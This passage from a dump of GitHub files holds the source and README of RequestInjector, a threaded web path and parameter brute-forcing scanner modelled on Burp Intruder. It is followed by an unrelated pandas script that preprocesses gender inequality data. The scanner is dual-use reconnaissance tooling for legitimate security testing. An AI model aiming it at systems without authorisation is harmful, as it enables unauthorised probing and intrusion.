Handlers)\n#\n#================================================\n\n\n\nclass Drainer(threading.Thread):\n\t\"\"\"provides output management\"\"\"\n\tdef __init__(self, queue, color=False, output_file=\"\", simple_output=False):\n\t\tthreading.Thread.__init__(self)\n\t\tself.setDaemon(True)\n\t\tself.queue = queue\n\t\tself.name = threading.current_thread().name\n\t\tself.color = color\n\t\tself.output_file = output_file\n\t\tself.simple_output = simple_output\n\n\tdef printToTerminal(self, item):\n\t\t\"\"\"handles sending full and condensed output to stdout/stderr\"\"\"\n\t\tif \"EXCEPTION\" not in str(item) and \"REASON\" not in str(item) and \"INFO\" not in str(item):\n\t\t\tif self.simple_output or self.color:\n\t\t\t\ts = str(item).split()[0].split(\"status_code:\")[1]\n\t\t\t\tu = str(item).split(\"url:\")[1]\n\t\t\t\t# rejoin into a single string\n\t\t\t\titem = s + \" \" + u\n\t\t\tif self.color:\n\t\t\t\tif str(item)[0].isdigit():\n\t\t\t\t\titem = str(item).split()\n\t\t\t\t\tif item[0][0] == \"1\":\n\t\t\t\t\t\titem[0] = \"\\033[94m\" + item[0] + \"\\033[0m\" # blue + reset code\n\t\t\t\t\telif item[0][0] == \"2\":\n\t\t\t\t\t\titem[0] = \"\\033[92m\" + item[0] + \"\\033[0m\" # green + reset code\n\t\t\t\t\telif item[0][0] == \"3\":\n\t\t\t\t\t\titem[0] = \"\\033[93m\" + item[0] + \"\\033[0m\" # yellow + reset code\n\t\t\t\t\telif item[0][0] == \"4\":\n\t\t\t\t\t\titem[0] = \"\\033[91m\" + item[0] + \"\\033[0m\" # red + reset code\n\t\t\t\t\telif item[0][0] == \"5\":\n\t\t\t\t\t\titem[0] = \"\\033[95m\" + item[0] + \"\\033[0m\" # purple + reset code\n\t\t\t\t\t# rejoin into a single string\n\t\t\t\t\titem = \" \".join(item)\n\t\t\tprint(item)\n\t\telse:\n\t\t\tsys.stderr.write(f\"{item}\\n\")\n\n\tdef run(self):\n\t\t\"\"\"dispatches output handling\"\"\"\n\t\twhile True:\n\t\t\titem = self.queue.get()\n#\t\t\tprint(f\"\\033[33m{self.name}\\033[0m removed from queueout:\\t{item}\") # gold\n\t\t\tif item is None:\n\t\t\t\tbreak\n\t\t\tself.printToTerminal(item)\n\t\t\tself.queue.task_done()\n\n\n\n#================================================\n#\n# Primary Object\n#\n#================================================\n\n\n\nclass RequestInjector:\n\t\"\"\"main handler to dispatch threaded objects\"\"\"\n\tdef __init__(self, url, wordlist, staticargs, injectkeys, longest, fillvalue, delay=0.0, mode=\"path\", attacktype=None, threads=5, mutate=False, headers={}, proxy={}, retries=None, url_encode=False, simple_output=False, color=False):\n\t\tself.wordlist = wordlist\n\t\tself.mode = mode\n\t\tself.attacktype = attacktype\n\t\tself.staticargs = staticargs\n\t\tself.injectkeys = injectkeys\n\t\tself.longest = longest\n\t\tself.fillvalue = fillvalue\n\t\tself.delay = delay\n\t\tself.threads = threads\n\t\tself.mutate = mutate\n\t\t# convert the url to a list of url(s)\n\t\t# TODO - self.url depends on the mode, and ProcessUrl should be called in the handlers\n\t\tself.url = ProcessUrl(url=url, mutate=self.mutate, mode=self.mode).output # list\n\t\tself.headers = headers\n\t\tself.proxy = proxy\n\t\tself.retries = retries\n\t\tself.url_encode = url_encode\n\t\tself.simple_output = simple_output\n\t\tself.color = color\n\n\tdef preflightChecks(self):\n\t\t\"\"\"sanity checks for various mode requirements\"\"\"\n\t\t# check that mode is approved\n\t\tif not self.mode in [\"path\", \"arg\", \"body\"]:\n\t\t\tprint(\"Error: mode not one of: path, arg, body\")\n\t\t\tsys.exit(1)\n\t\t# checks for path mode\n\t\tif not self.wordlist and self.mode == \"path\":\n\t\t\tprint(\"Error: mode 
set to path, but no wordlist provided (-w/--wordlist WORDLIST)\")\n\t\t\tsys.exit(1)\n\t\t# check that if --longest is used, --fillvalue VALUE is also specified\n\t\tif self.longest and self.fillvalue == \"\":\n\t\t\tprint(\"Error: --longest was specified, but no filler value was provided for inevitable nulls (-F/--fillvalue VALUE)\")\n\t\t\tsys.exit(1)\n\t\t# TODO - ADD MODE HANDLERS HERE SO run() CAN DISPATCH THESE FOR READABILITY\n\n\tdef run(self):\n\t\t\"\"\"dispatch threads to perform specified actions\"\"\"\n\t\t# sanity checks first\n\t\tself.preflightChecks()\n\t\t# this queue gets filled with words from the wordlist\n\t\tqueuein = queue.Queue()\n\t\t# this queue gets filled with the web request results\n\t\tqueueout = queue.Queue()\n\t\t# hold thread objects here to be joined\n\t\tthreads = []\n\t\t# begin loading words into queuein using Fillers\n\t\t# worker threads read from queuein and send results to queueout\n\t\t# each thread gets a word and checks it against all URLs\n\t\t#\n\t\t# path mode\n\t\tif self.mode == \"path\":\n\t\t\tf = PathFiller(queue=queuein, wordlist=self.wordlist)\n\t\t\tf.name = \"PathFiller\"\n\t\t\tf.start()\n\t\t\tthreads.append(f)\n\t\t\tfor i in range(self.threads):\n\t\t\t\tw = PathWorker(queuein=queuein, queueout=queueout, delay=self.delay, urls=self.url, headers=self.headers, proxy=self.proxy, retries=self.retries)\n\t\t\t\tw.name = f\"Worker-{i}\"\n\t\t\t\t#print(f\"starting Worker-{i}\")\n\t\t\t\tw.start()\n\t\t\t\tthreads.append(w)\n\t\t#\n\t\t# arg mode\n\t\telif self.mode == \"arg\":\n\t\t\t#\n\t\t\t# shotgun attacktype\n\t\t\tif self.attacktype == \"shotgun\":\n\t\t\t\tf = ArgShotgunFiller(queue=queuein, wordlist=self.wordlist, injectkeys=self.injectkeys, staticargs=self.staticargs)\n\t\t\t\tf.name = \"ArgShotgunFiller\"\n\t\t\t#\n\t\t\t# trident attacktype\n\t\t\telif self.attacktype == \"trident\":\n\t\t\t\tif not self.longest:\n\t\t\t\t\tf = ArgTridentFiller(queue=queuein, wordlist=self.wordlist, injectkeys=self.injectkeys, staticargs=self.staticargs)\n\t\t\t\telse:\n\t\t\t\t\tf = ArgTridentLongestFiller(queue=queuein, wordlist=self.wordlist, injectkeys=self.injectkeys, staticargs=self.staticargs, longest=self.longest, fillvalue=self.fillvalue)\n\t\t\t\tf.name = \"ArgTridentFiller\"\n\t\t\tf.start()\n\t\t\tthreads.append(f)\n\t\t\tfor i in range(self.threads):\n\t\t\t\tw = ArgWorker(queuein=queuein, queueout=queueout, delay=self.delay, urls=self.url, headers=self.headers, proxy=self.proxy, retries=self.retries)\n\t\t\t\tw.name = f\"Worker-{i}\"\n\t\t\t\t#print(f\"starting Worker-{i}\")\n\t\t\t\tw.start()\n\t\t\t\tthreads.append(w)\n\t\t#\n\t\t# thread to handle output\n\t\td = Drainer(queueout, simple_output=self.simple_output, color=self.color)\n\t\td.name = \"Drainer\"\n\t\td.start()\n\t\tthreads.append(d)\n\t\t#\n\t\t# do not join daemon threads, but do check queue sizes\n\t\t# ensure the daemon threads have finished by checking that the queues are empty\n\t\t#print(\"\\033[33;7mqueuein is empty\\033[0m\") # gold background\n\t\tqueuein.join()\n\t\t#print(\"\\033[33;7mqueueout is empty\\033[0m\") # gold background\n\t\tqueueout.join()\n\n\n\n#================================================\n#\n# Entrypoint Functions\n#\n#================================================\n\n\n\ndef tool_entrypoint():\n\t\"\"\"this function handles argparse arguments and serves as the entry_points reference in setup.py\"\"\"\n\t# collect command line arguments\n\tparser = argparse.ArgumentParser(description=\"RequestInjector: scan a URL using one or 
more given wordlists with optional URL transformations\")\n\t# required arguments\n\treq = parser.add_argument_group(\"required arguments\")\n\treq.add_argument(\"-u\", \"--url\", dest=\"url\", type=str, help=\"provide a URL to check\", required=True)\n\t# general arguments\n\tgen = parser.add_argument_group(\"general arguments\")\n\tgen.add_argument(\"-w\", \"--wordlist\", dest=\"wordlist\", type=str, help=\"provide a wordlist (file) location, or multiple comma-separated files in a string, ex. -w /home/user/words1.txt or -w /home/user/words1.txt,/home/user/words2.txt, etc\")\n\tgen.add_argument(\"-M\", \"--mode\", dest=\"mode\", default=\"path\", type=str, help=\"provide a mode (path|arg|body(NYI)) (default path)\")\n\tgen.add_argument(\"-H\", \"--headers\", dest=\"headers\", default={}, type=json.loads, help=\"provide a dictionary of headers to include, with single-quotes wrapping the dictionary and double-quotes wrapping the keys and values, ex. '{\\\"Content-Type\\\": \\\"application/json\\\"}' (defaults to a Firefox User-Agent and Accept: text/html) *note default is set inside PathWorker class*\")\n\tgen.add_argument(\"-p\", \"--proxy\", dest=\"proxy\", default={}, type=json.loads, help=\"provide a dictionary of proxies to use, with single-quotes wrapping the dictionary and double-quotes wrapping the keys and values, ex. '{\\\"http\\\": \\\"http://127.0.0.1:8080\\\", \\\"https\\\": \\\"https://127.0.0.1:8080\\\"}'\")\n\tgen.add_argument(\"-r\", \"--retries\", dest=\"retries\", default=1, type=int, help=\"provide the number of times to retry a connection (default 1)\")\n\tgen.add_argument(\"-t\", \"--threads\", dest=\"threads\", default=10, type=int, help=\"provide the number of threads for making requests (default 10)\")\n\tgen.add_argument(\"-d\", \"--delay\", dest=\"delay\", default=0.0, type=float, help=\"provide a delay between requests, per thread, as a float (default 0.0); use fewer threads and longer delays if the goal is to be less noisy, although the amount of requests will remain the same\")\n\tgen.add_argument(\"-m\", \"--mutate\", dest=\"mutate\", action=\"store_true\", help=\"provide if mutations should be applied to the checked URL+word (currently only supports path mode, arg mode support nyi)\")\n\t# arg mode-specific arguments\n\tams = parser.add_argument_group(\"arg mode-specific arguments\")\n\tams.add_argument(\"-T\", \"--attacktype\", dest=\"attacktype\", default=\"shotgun\", type=str, help=\"provide an attack type (shotgun|trident); shotgun is similar to Burp Suite's sniper and battering ram modes, and trident is similar to pitchfork (default shotgun)\")\n\tams.add_argument(\"--longest\", dest=\"longest\", action=\"store_true\", help=\"provide if you wish to fully exhaust the longest wordlist using the trident attacktype, and not stop when the end of shortest wordlist has been reached (zip() vis itertools.zip_longest()\")\n\tams.add_argument(\"-F\", \"--fillvalue\", dest=\"fillvalue\", default=\"\", type=str, help=\"provide a string to use in null values when using --longest with the trident attacktype (such as when using two wordlists of differing lengths; the fillvalue will be used when the shortest wordlist has finished, but terms are still being used from the longest wordlist)\")\n\tams.add_argument(\"-S\", \"--staticargs\", dest=\"staticargs\", default=\"\", type=str, help=\"provide a string of static key=value pairs to include in each request, appended to the end of the query, as a comma-separated string, ex. 
key1=val1,key2=val2 etc\")\n\tams.add_argument(\"-K\", \"--injectkeys\", dest=\"injectkeys\", default=\"\", type=str, help=\"provide a string of keys to be used; using the shotgun attacktype, each key will receive values from only the first wordlist; using the trident attacktype, each key must have a specifc wordlist specified in the matching position with the -w WORDLIST option; ex. '-T trident -K user,account,sid -w userwords.txt,accountids.txt,sids.txt'\")\n\t# output arguments\n\tota = parser.add_argument_group(\"output arguments\")\n\tota.add_argument(\"--color\", dest=\"color\", action=\"store_true\", help=\"provide if stdout should have colorized status codes (will force simple_output format)\")\n\tota.add_argument(\"--simple_output\", dest=\"simple_output\", action=\"store_true\", help=\"provide for simplified output, just status code and URL, ex. 200 http://example.com\")\n\t# get arguments as variables\n\targs = vars(parser.parse_args())\n\theaders = args[\"headers\"]\n\tmutate = args[\"mutate\"]\n\tproxy = args[\"proxy\"]\n\tretries = args[\"retries\"]\n\tthreads = args[\"threads\"]\n\tdelay = args[\"delay\"]\n\turl = args[\"url\"]\n\twordlist = args[\"wordlist\"].split(\",\")\n\tmode = args[\"mode\"]\n\tattacktype = args[\"attacktype\"]\n\tstaticargs = args[\"staticargs\"].split(\",\")\n\tinjectkeys = args[\"injectkeys\"].split(\",\")\n#\tinjectvalues = args[\"injectvalues\"].split(\",\")\n\tcolor = args[\"color\"]\n\tsimple_output = args[\"simple_output\"]\n\tlongest = args[\"longest\"]\n\tfillvalue = args[\"fillvalue\"]\n\t#\n\t# initialize and run the primary object (RequestInjector)\n\tx = RequestInjector(url=url, wordlist=wordlist, mode=mode, attacktype=attacktype, staticargs=staticargs, injectkeys=injectkeys, threads=threads, delay=delay, longest=longest, fillvalue=fillvalue, mutate=mutate, headers=headers, proxy=proxy, retries=retries, simple_output=simple_output, color=color) #, simple_output=True)\n\tx.run()\n\n\n\n#================================================\n#\n# Execution Guard\n#\n#================================================\n\n\n\n# this allows the script to be invoked directly (if the repo was cloned, if just this file was downloaded and placed in some bin path, etc)\n# note the time message gets sent to stderr, just 2> /dev/null or comment it out if undesired\nif __name__ == \"__main__\":\n\n\t# time script execution\n\tstartTime = time.time()\n\n\ttool_entrypoint()\n\n\t# time script execution\n\tendTime = time.time()\n\ttotalTime = endTime - startTime\n\tsys.stderr.write(f\"took {totalTime} seconds\\n\")\n\tsys.exit(0)"
},
{
"alpha_fraction": 0.6269450783729553,
"alphanum_fraction": 0.653793454170227,
"avg_line_length": 52.93043518066406,
"blob_id": "39bb676c5380343ae951bc2600d7cc6fd5185c46",
"content_id": "ac5efb0849604e07ae7a343adf12ebabdf6f4ba2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12403,
"license_type": "permissive",
"max_line_length": 274,
"num_lines": 230,
"path": "/README.md",
"repo_name": "bonifield/RequestInjector",
"src_encoding": "UTF-8",
"text": "# RequestInjector\nscan a URL using one or more given wordlists with optional URL transformations\n\n### What is RequestInjector?\nThis tool scans a single URL at a time, using wordlists to try various path combinations and key/value query pairs. RequestInjector is a single standalone script that can be kept in a tools folder until needed, or installed directly via pip and accessed directly from $PATH.\n- in `path` mode (`-m path`), try all words against a URL path, with optional mutations\n\t- given the URL \"http://example.com/somepath/a/b/c\", a wordlist to pull terms from, and -m/--mutate specified, worker threads will try each mutation of the URL and the current term (WORD):\n\t\t- \"http://example.com/WORD\", \"http://example.com/somepath/WORD\", \"http://example.com/somepath/a/WORD\", \"http://example.com/somepath/a/b/WORD\", \"http://example.com/somepath/a/b/c/WORD\"\n- in `arg` mode (`-m arg`), try all words against a specified set of keys\n\t- using the `shotgun` attacktype (`-T shotgun`), provide a single wordlist against one or more keys (similar to Burp Suite's Intruder modes Sniper and Battering Ram)\n\t- using the `trident` attacktype (`-T trident`), provide one wordlist per key, and terminate upon reaching either the end of the shortest wordlist (default) or the longest (`--longest --fillvalue VALUE`) (similar to Burp Suite's Intruder mode Pitchfork)\n- in `body` mode (`-m body`), use a template to submit dynamic body content to a given target, utilizing either the `shotgun` or `trident` attacktype (also supports URL-based modes above)\n\t- `body` is not yet implemented\n\n\n### Installation [GitHub](https://github.com/bonifield/RequestInjector) [PyPi](https://pypi.org/project/requestinjector/)\n```\npip install requestinjector\n# will become available directly from $PATH as either \"requestinjector\" or \"ri\"\n```\n\n### Usage (Command Line Tool or Standalone Script Somewhere in $PATH)\n```\nv0.9.4\nLast Updated: 2021-09-21\n\npath mode (-M path):\n\t# NOTE - although -w accepts a comma-separated list of wordlists as a string, only the first one will be used for this mode\n\t\trequestinjector -u \"http://example.com/somepath/a/b/c\" \\\n\t\t-M path \\\n\t\t-w \"/path/to/wordlist.txt\" \\\n\t\t-t 10 \\\n\t\t-r 2 \\\n\t\t-m \\\n\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n\t\t--color\n\narg mode (-M arg) using shotgun attacktype (-T shotgun):\n\t# NOTE - shotgun is similar to Burp Suite's sniper and battering ram modes; provide one or more keys, and a single wordlist\n\t# NOTE - although -w accepts a comma-separated list of wordlists as a string, only the first one will be used for this attacktype\n\t# NOTE - mutations (-m) not yet available for arg mode\n\t\trequestinjector -u \"http://example.com/somepath/a/b/c\" \\\n\t\t-M arg \\\n\t\t-T shotgun \\\n\t\t-K key1,key2,key3,key4 \\\n\t\t-w \"/path/to/wordlist.txt\" \\\n\t\t-S statickey1=staticval1,statickey2=staticval2 \\\n\t\t-t 10 \\\n\t\t-r 2 \\\n\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n\t\t--color\n\narg mode (-M arg) using trident attacktype (-T trident), and optional static arguments (-S):\n\t# NOTE - trident is similar to Burp Suite's pitchfork mode; for each key specified, provided a wordlist (-w WORDLIST1,WORDLIST2,etc); specify the same wordlist multiple times if using this attacktype and you want the same wordlist in 
multiple positions\n\t# NOTE - this type will run through to the end of the shortest provided wordlist; use --longest and --fillvalue VALUE to run through the longest provided wordlist instead\n\t# NOTE - mutations (-m) not yet available for arg mode\n\t\trequestinjector -u \"http://example.com/somepath/a/b/c\" \\\n\t\t-M arg \\\n\t\t-T trident \\\n\t\t-K key1,key2,key3,key4 \\\n\t\t-w /path/to/wordlist1.txt,/path/to/wordlist2.txt,/path/to/wordlist3.txt,/path/to/wordlist4.txt \\\n\t\t-S statickey1=staticval1,statickey2=staticval2 \\\n\t\t-t 10 \\\n\t\t-r 2 \\\n\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n\t\t--color\n\narg mode (-M arg) using trident attacktype (-T trident), optional static arguments (-S), and --longest and --fillvalue VALUE (itertools.zip_longest())\n\t# NOTE - trident is similar to Burp Suite's pitchfork mode; for each key specified, provided a wordlist (-w WORDLIST1,WORDLIST2,etc); specify the same wordlist multiple times if using this attacktype and you want the same wordlist in multiple positions\n\t# NOTE - --longest and --fillvalue VALUE will run through to the end of the longest provided wordlist, filling empty values with the provided fillvalue\n\t# NOTE - mutations (-m) not yet available for arg mode\n\t\trequestinjector -u \"http://example.com/somepath/a/b/c\" \\\n\t\t-M arg \\\n\t\t-T trident \\\n\t\t-K key1,key2,key3,key4 \\\n\t\t-w /path/to/wordlist1.txt,/path/to/wordlist2.txt,/path/to/wordlist3.txt,/path/to/wordlist4.txt \\\n\t\t-S statickey1=staticval1,statickey2=staticval2 \\\n\t\t--longest \\\n\t\t--fillvalue \"AAAA\" \\\n\t\t-t 10 \\\n\t\t-r 2 \\\n\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n\t\t--color\n\noutput modes: full (default), --simple_output (just status code and full url), --color (same as simple_output but the status code is colorized)\n\nadditional options:\n\t-d/--delay [FLOAT] = add a delay, per thread, as a float (default 0.0)\n\nor import as a module (from requestinjector import RequestInjector)\n```\n\n### Usage (Importable Module)\n```\nfrom requestinjector import RequestInjector\n\nproxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html'}\nurl = \"http://example.com/somepath/a/b/c\"\nwordlist = [\"/path/to/wordlist.txt\"]\n\nx = RequestInjector(url=url, wordlist=wordlist, threads=10, mutate_path=True, headers=headers, proxy=proxy, retries=1, staticargs=\"\", injectkeys=\"\", longest=None, fillvalue=None, simple_output=True)\nx.run()\n```\n\n### Options (-h)\n```\nusage: requestinjector.py [-h] -u URL [-w WORDLIST] [-M MODE] [-H HEADERS]\n [-p PROXY] [-r RETRIES] [-t THREADS] [-d DELAY] [-m]\n [-T ATTACKTYPE] [--longest] [-F FILLVALUE]\n [-S STATICARGS] [-K INJECTKEYS] [--color]\n [--simple_output]\n\nRequestInjector: scan a URL using a given wordlist with optional URL\ntransformations\n\noptional arguments:\n -h, --help show this help message and exit\n\nrequired arguments:\n -u URL, --url URL provide a URL to check\n\ngeneral arguments:\n -w WORDLIST, --wordlist WORDLIST\n provide a wordlist (file) location, or multiple comma-\n separated files in a string, ex. 
-w\n /home/user/words1.txt or -w\n /home/user/words1.txt,/home/user/words2.txt, etc\n -M MODE, --mode MODE provide a mode (path|arg|body(NYI)) (default path)\n -H HEADERS, --headers HEADERS\n provide a dictionary of headers to include, with\n single-quotes wrapping the dictionary and double-\n quotes wrapping the keys and values, ex. '{\"Content-\n Type\": \"application/json\"}' (defaults to a Firefox\n User-Agent and Accept: text/html) *note default is set\n inside PathWorker class*\n -p PROXY, --proxy PROXY\n provide a dictionary of proxies to use, with single-\n quotes wrapping the dictionary and double-quotes\n wrapping the keys and values, ex. '{\"http\":\n \"http://127.0.0.1:8080\", \"https\":\n \"https://127.0.0.1:8080\"}'\n -r RETRIES, --retries RETRIES\n provide the number of times to retry a connection\n (default 1)\n -t THREADS, --threads THREADS\n provide the number of threads for making requests\n (default 10)\n -d DELAY, --delay DELAY\n provide a delay between requests, per thread, as a\n float (default 0.0); use fewer threads and longer\n delays if the goal is to be less noisy, although the\n amount of requests will remain the same\n -m, --mutate provide if mutations should be applied to the checked\n URL+word (currently only supports path mode, arg mode\n support nyi)\n\narg mode-specific arguments:\n -T ATTACKTYPE, --attacktype ATTACKTYPE\n provide an attack type (shotgun|trident); shotgun is\n similar to Burp Suite's sniper and battering ram\n modes, and trident is similar to pitchfork (default\n shotgun)\n --longest provide if you wish to fully exhaust the longest\n wordlist using the trident attacktype, and not stop\n when the end of shortest wordlist has been reached\n (zip() vis itertools.zip_longest()\n -F FILLVALUE, --fillvalue FILLVALUE\n provide a string to use in null values when using\n --longest with the trident attacktype (such as when\n using two wordlists of differing lengths; the\n fillvalue will be used when the shortest wordlist has\n finished, but terms are still being used from the\n longest wordlist)\n -S STATICARGS, --staticargs STATICARGS\n provide a string of static key=value pairs to include\n in each request, appended to the end of the query, as\n a comma-separated string, ex. key1=val1,key2=val2 etc\n -K INJECTKEYS, --injectkeys INJECTKEYS\n provide a string of keys to be used; using the shotgun\n attacktype, each key will receive values from only the\n first wordlist; using the trident attacktype, each key\n must have a specifc wordlist specified in the matching\n position with the -w WORDLIST option; ex. '-T trident\n -K user,account,sid -w\n userwords.txt,accountids.txt,sids.txt'\n\noutput arguments:\n --color provide if stdout should have colorized status codes\n (will force simple_output format)\n --simple_output provide for simplified output, just status code and\n URL, ex. 
200 http://example.com\n```\n\n### Example Output\n```\n# Standard Format\n# Provided URL: http://example.com/somepath/exists\n# Note the IP and port reflect the proxy being used; without a proxy, this will reflect the external address being scanned\nstatus_code:404 bytes:12 word:contactus ip:127.0.0.1 port:8080 url:http://example.com/contactus\nstatus_code:404 bytes:12 word:contactus ip:127.0.0.1 port:8080 url:http://example.com/somepath/contactus\nstatus_code:200 bytes:411 word:contactus ip:127.0.0.1 port:8080 url:http://example.com/somepath/exists/contactus\nstatus_code:404 bytes:12 word:admin ip:127.0.0.1 port:8080 url:http://example.com/admin\nstatus_code:200 bytes:556 word:admin ip:127.0.0.1 port:8080 url:http://example.com/somepath/admin\nstatus_code:200 bytes:556 word:admin ip:127.0.0.1 port:8080 url:http://example.com/somepath/exists/admin\n\n# Simplified Format (simple_output)\n404 http://example.com/contactus\n404 http://example.com/somepath/contactus\n200 http://example.com/somepath/exists/contactus\n404 http://example.com/admin\n200 http://example.com/somepath/admin\n200 http://example.com/somepath/exists/admin\n```\n\n### TODO\n- preview mode\n- body mode, recursive grep, method select/switching\n- logfile dump for every execution\n- redirect history handling\n- body POST/PUT objects using a config\n- optional encodings and obfuscation of words/terms\n- better output handling to support response body content, headers sent/received, etc\n- move more logic out of Worker classes and into pre-processing/Filler and post-processing/Drainer classes\n- jitter, rotating user agents, arg mode mutations (duplicate keys, re-order, null bytes, etc)\n- \"real timeout\" (-R) to use with requests"
}
] | 4 |
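The README in the record above maps the trident attack type onto Python's `zip()` and `itertools.zip_longest()`. A minimal sketch of that pairing logic, using made-up keys and wordlists (none of these values come from the tool itself):

```python
from itertools import zip_longest

# hypothetical keys and one wordlist per key (trident: positional pairing)
keys = ["user", "account", "sid"]
wordlists = [["alice", "bob"], ["1001", "1002", "1003"], ["x9"]]

# default behavior: stop when the shortest wordlist is exhausted
for values in zip(*wordlists):
    print("&".join(f"{k}={v}" for k, v in zip(keys, values)))
# -> user=alice&account=1001&sid=x9

# --longest behavior: run to the end of the longest list, padding with a fillvalue
for values in zip_longest(*wordlists, fillvalue="AAAA"):
    print("&".join(f"{k}={v}" for k, v in zip(keys, values)))
# -> last line printed: user=AAAA&account=1003&sid=AAAA
```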
dlaumer/mmcarto
|
https://github.com/dlaumer/mmcarto
|
3aa49209da35f4245ec3b02129162d5f850b4c8a
|
2a570270ebcb49d836d780b838a41db0f0fba0cc
|
de4c3c7cfc37f3404abf4c1bec546f3333b92959
|
refs/heads/master
| 2022-06-04T20:34:50.574357 | 2020-05-05T06:56:44 | 2020-05-05T06:56:44 | 261,382,105 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6732206344604492,
"alphanum_fraction": 0.6889500617980957,
"avg_line_length": 40,
"blob_id": "4b598f7b62260643a825458ee5e4ee7baadeca40",
"content_id": "cdef15aec051ca26cc2428145900beebc8d16095",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2543,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 62,
"path": "/preprocessData.py",
"repo_name": "dlaumer/mmcarto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 15 14:58:31 2020\n\n@author: dlaumer\n\"\"\"\nimport pandas as pd\nimport numpy as np\n\t\n#Read file\ndf = pd.read_csv('Gender Inequality Index (GII).csv', delimiter=',')\n# Delete all columns which are empty\ndf = df.dropna(axis='columns',how='all')\n# Delete one specific column called Unnamed: 3\ndf = df.drop(columns = ['Unnamed: 3'])\n# Replace all \"..\" with None\ndf = df.replace(\"..\",np.NaN)\n# Delete the last 19 rows because they contain data we don't need\ndf.drop(df.tail(19).index,inplace=True)\n# Change the data type of the first column to float instead of string\ndf[list(df)[0]] = df[list(df)[0]].astype(float)\n# Change the data type of the other columns to float instead of string\nfor i in range(2,len(list(df))):\n df[list(df)[i]] = df[list(df)[i]].astype(float)\n\n# Change the name of the country to the one of the other file so that the joining works\ndf['Country'][df['Country']=='United States'] = 'United States of America'\ndf['Country'][df['Country']=='Congo (Democratic Republic of the)'] = 'Congo, Democratic Republic of the'\ndf['Country'][df['Country']=='Eswatini (Kingdom of)'] = 'Eswatini'\ndf['Country'][df['Country']=='Hong Kong, China (SAR)'] = 'Hong Kong'\ndf['Country'][df['Country']=='Korea (Republic of)'] ='Korea, Republic of'\ndf['Country'][df['Country']=='Moldova (Republic of)'] = 'Moldova, Republic of'\ndf['Country'][df['Country']=='Tanzania (United Republic of)'] = 'Tanzania, United Republic of'\ndf['Country'][df['Country']=='United Kingdom'] = 'United Kingdom of Great Britain and Northern Ireland'\n\n# Sort the values by country for the join\ndf = df.sort_values(by=['Country'])\n\n# Read in the second file with the 3 letter ids for the countries\ndf1 = pd.read_csv('countryIds.csv',delimiter=',')\n# Only keep the two columns with the country name and the id\ndf1 = df1[['name','alpha-3']]\n# Also sort for the join\ndf1 = df1.sort_values(by=['name'])\n# Join the two datasets\ndf2 = pd.merge(df, df1, left_on='Country',right_on='name')\n\n#Prepare the data for export to tsv\n# Remove some unneeded columns\ndfExport = df2.drop(columns = [\"HDI Rank (2018)\", \"name\"])\n# Replace alll 0 values with None\ndf = df.replace(0,np.NaN)\n# Rename the columns\ndfExport = dfExport.rename({\"alpha-3\":\"id\", \"Country\":\"name\"}, axis='columns')\n# Export to tsv\ndfExport.to_csv(\"GII.tsv\", index = False, sep = '\t')\n\ndfExportT = dfExport.transpose()\ndfExportT = dfExportT.drop(['name'])\ndfExportT = dfExportT.rename(index = {\"id\":\"year\"})\ndfExportT.to_csv(\"GIIGraph.csv\", sep = ',')\n\n"
},
{
"alpha_fraction": 0.7538461685180664,
"alphanum_fraction": 0.8153846263885498,
"avg_line_length": 31.5,
"blob_id": "4f8308c1499c7d16be433b8f076975c0a49fd51b",
"content_id": "0a1ff305bd54d2371e45e7f45d1f40f754d201d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 65,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 2,
"path": "/README.md",
"repo_name": "dlaumer/mmcarto",
"src_encoding": "UTF-8",
"text": "# mmcarto\nProject for Multimedia Cartography at ETH Zurich, 2020\n"
}
] | 2 |
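The `preprocessData.py` entry above hinges on a name-based `pd.merge` between the GII table and the country-ID table, which is why several country names are rewritten first. A toy sketch of that join, with illustrative values only:

```python
import pandas as pd

# stand-ins for the GII table and the country-ID table (numbers are made up)
gii = pd.DataFrame({"Country": ["Norway", "United States of America"],
                    "GII (2018)": [0.044, 0.182]})
ids = pd.DataFrame({"name": ["Norway", "United States of America"],
                    "alpha-3": ["NOR", "USA"]})

# inner join on country names: rows that do not match in both frames are
# silently dropped, so the renames decide which countries survive the merge
merged = pd.merge(gii, ids, left_on="Country", right_on="name")
print(merged[["Country", "alpha-3", "GII (2018)"]])
```

Note that `pd.merge` matches on values rather than row order, so the `sort_values` calls in the script are not required for the join to be correct.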
bdatdo0601/projectKitten
|
https://github.com/bdatdo0601/projectKitten
|
395c711974409658e9e2dcd014ac743df6986e3f
|
741d3cc353cedce331d749928be2d36e8d929c7c
|
a3ce20108293ce11b1214716a7f2afd133f86471
|
refs/heads/master
| 2021-01-19T09:12:37.608359 | 2017-04-11T02:10:45 | 2017-04-11T02:10:59 | 87,739,914 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6733435988426208,
"alphanum_fraction": 0.7030045986175537,
"avg_line_length": 34.57534408569336,
"blob_id": "44dbee56e47b83009b3680e562660972d2636ffd",
"content_id": "af0bc5482a944988b834a9eb53dd6c3cac696b28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2596,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 73,
"path": "/createData.py",
"repo_name": "bdatdo0601/projectKitten",
"src_encoding": "UTF-8",
